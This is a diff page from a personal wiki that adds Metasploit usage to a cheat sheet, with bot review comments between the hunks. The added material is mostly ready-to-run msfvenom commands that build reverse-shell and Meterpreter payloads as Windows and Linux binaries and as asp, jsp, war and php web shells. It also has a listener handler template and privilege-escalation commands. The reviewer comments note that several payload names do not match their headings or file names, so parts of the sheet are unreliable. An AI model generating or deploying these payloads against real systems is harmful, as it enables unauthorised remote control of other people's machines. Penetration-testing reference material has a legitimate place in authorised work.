The gMan nixWiki

Because the mind is made of Teflon...


cheat_sheets_metasploit

Differences

This shows you the differences between two versions of the page.

cheat_sheets_metasploit [2022/12/31 00:42] – [Modules & Categories] gman
cheat_sheets_metasploit [2022/12/31 21:50] (current) – [Two Common Commands] gman
Line 49: Line 49:
   * Example, CVE: ''search ms17-101''   * Example, CVE: ''search ms17-101''
   * Example, type: ''search type:auxiliary telnet''   * Example, type: ''search type:auxiliary telnet''
 +
 +**Alternative Search Option:** Rapid7 maintains a [[https://www.rapid7.com/db/?type=metasploit | searchable web-based exploit database]]. Find your exploit there and tell msf to use it.
  
 ''info'' - To see more information on the loaded module. You can see info on any module at any time by using the command ''info'' followed by the full path the module you need info on. ''info'' - To see more information on the loaded module. You can see info on any module at any time by using the command ''info'' followed by the full path the module you need info on.
  
-**Search Parameters (Keywords):**+**Parameters (Keywords):**
  
 ^  Keyword    Description                              ^ ^  Keyword    Description                              ^
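
Review bot: The heading change from "Search Parameters (Keywords)" to "Parameters (Keywords)" removes the one word that says what the keyword table under it is for; the section is still about ''search'', so the heading should keep "Search". In the added "Alternative Search Option" paragraph, "tell msf to use it" is vague: say which value from the database entry goes to which console command. The unchanged example labelled "CVE" searches for ''ms17-101'', which has the form of a Microsoft bulletin number rather than a CVE ID, so that label should be corrected while this section is being edited.
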
Line 192: Line 194:
  
 ---- ----
 +
 +===== Syntax (Examples) =====
 +
 +==== Two Common Commands ====
 +
 +After a successful exploit (and assuming your payload was Meterpreter), two common commands you will likely often want to try: 
 +
 +<code>
 +# priv esc to admin
 +getsystem
 +
 +# get a shell in the exploit directory on the target
 +shell
 +</code>
 +
 +
 +==== msfvenom ====
 +
 +See [[cheat_sheets_various#msfvenom | here]].       
 +
 +==== MSF Handler ====
 +
 +''msfconsole''...Handlers should be in the following format:
 +
 +<code>
 +use exploit/multi/handler
 +set PAYLOAD <Payload name>
 +set LHOST <LHOST value>
 +set LPORT <LPORT value>
 +</code>
 +
 +==== Non-Meterpreter Binaries ====
 +
 +**Staged Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Stageless Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Staged Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +**Stageless Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +==== Non-Meterpreter Web Payloads ====
 +
 +<code>
 +# asp 
 +msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
 +
 +# jsp
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
 +
 +# war
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
 +
 +# php
 +msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
 +</code>
 +
 +==== Meterpreter Binaries ====
 +
 +**Staged Payloads for Windows**
 +
 +<code>
 +
 +# x86
 +msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Stageless Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Staged Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +**Stageless Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +==== Meterpreter Web Payloads ====
 +
 +<code>
 +# asp
 +msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
 +
 +# jsp
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
 +
 +# war
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
 +
 +# php
 +msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
 +</code>
  
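
Review bot: Several payload names in the added msfvenom blocks do not match the heading or output file they sit under. In the non-Meterpreter "Staged Payloads for Windows" block, the x64 line uses ''windows/x64/shell_reverse_tcp'', the underscore form that the stageless blocks use, while the x86 line beside it uses the slash form ''windows/shell/reverse_tcp''. In the non-Meterpreter "Stageless Payloads for Windows" block, the x86 and x64 lines both use ''windows/shell_reverse_tcp'' and differ only in the output file name, so ''shell-x64.exe'' is not built from an x64 payload. In "Meterpreter Web Payloads", the jsp and war lines use ''java/jsp_shell_reverse_tcp'', identical to the non-Meterpreter section. Each of these should be corrected or moved so that heading, payload name and file name agree. The "MSF Handler" lead-in (''msfconsole''...Handlers should be in the following format:) also reads as a truncated sentence and should be completed.
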
cheat_sheets_metasploit.1672447327.txt.gz · Last modified: by gman